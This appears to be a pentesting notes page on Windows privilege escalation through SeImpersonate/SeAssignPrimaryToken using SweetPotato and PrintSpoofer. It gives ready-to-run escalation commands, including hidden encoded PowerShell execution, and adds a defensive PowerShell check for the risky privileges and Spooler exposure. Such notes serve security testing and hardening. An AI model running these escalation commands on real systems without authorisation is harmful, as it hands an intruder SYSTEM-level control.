# SeImpersonatePrivilege

### Potatoes

Potatoes are a common way to escalate privileges on a Windows system once enumeration shows that the current account holds either the `SeImpersonate` or the `SeAssignPrimaryToken` privilege. The privileges can be enumerated quickly by running the following command:

```bash
whoami /priv
```

#### Sweet Potato

As noted by [Jorge Lajara](https://jlajara.gitlab.io/Potatoes_Windows_Privesc#sweetPotato), [Sweet Potato](https://github.com/CCob/SweetPotato) is one of the most successful potatoes to escalate privileges with. It has the following exploits built in, rendering the other potatoes obsolete:

> * RottenPotato
> * Weaponized JuicyPotato with BITS WinRM discovery
> * PrintSpoofer
> * EfsRpc built on EfsPotato
> * PetitPotam

```bash
# Exploiting a host with SweetPotato
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"
```

### PrintSpoofer

```bash
# Verify that the Print Spooler service is running
Get-Service Spooler

# Run the PrintSpoofer executable to escalate privileges
.\PrintSpoofer.exe -i -c powershell
```
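
A defender-side check for the two conditions this page relies on, as an added example (not code from the original page or from the SweetPotato or PrintSpoofer projects): it parses `whoami /priv /fo csv /nh` output for the two privileges named above and reports whether the Print Spooler service is running. The function names `Get-RiskyPrivilege` and `Test-SpoolerExposure` and the sample rows are constructed for illustration.

```powershell
# Privileges this page names as the precondition for potato-style escalation.
$RiskyPrivileges = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'

function Get-RiskyPrivilege {
    # Hypothetical helper: filters whoami CSV rows down to the risky privileges.
    param(
        # Lines produced by: whoami /priv /fo csv /nh  (/nh drops the localized header)
        [string[]] $CsvLine
    )
    $CsvLine |
        Where-Object { $_.Trim() } |
        ConvertFrom-Csv -Header 'Privilege', 'Description', 'State' |
        Where-Object { $RiskyPrivileges -contains $_.Privilege } |
        # A privilege listed as Disabled is still held: the process can
        # enable it in its own token, so report it regardless of State.
        Select-Object Privilege, State
}

function Test-SpoolerExposure {
    # Hypothetical helper: PrintSpoofer needs the Print Spooler service running.
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    [pscustomobject]@{
        SpoolerInstalled = [bool]$svc
        SpoolerRunning   = ($svc -and $svc.Status -eq 'Running')
    }
}

# Constructed sample rows in the shape of whoami /priv /fo csv /nh output.
$sample = @'
"SeAssignPrimaryTokenPrivilege","Replace a process level token","Disabled"
"SeChangeNotifyPrivilege","Bypass traverse checking","Enabled"
"SeImpersonatePrivilege","Impersonate a client after authentication","Enabled"
'@ -split "`r?`n"

# Returns the two risky rows and drops SeChangeNotifyPrivilege.
Get-RiskyPrivilege -CsvLine $sample

# Reports the Spooler state of the host the script runs on.
Test-SpoolerExposure

# Live host: Get-RiskyPrivilege -CsvLine (whoami /priv /fo csv /nh)
```

Run under each service account being reviewed, an empty result from `Get-RiskyPrivilege` means that account's token holds neither privilege; a stopped Spooler on hosts that do not print removes the PrintSpoofer path only.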

### References

{% embed url="<https://jlajara.gitlab.io/Potatoes_Windows_Privesc>" %}
Guidance on using Potatoes
{% endembed %}

{% embed url="<https://github.com/itm4n/PrintSpoofer>" %}

{% embed url="<https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/>" %}
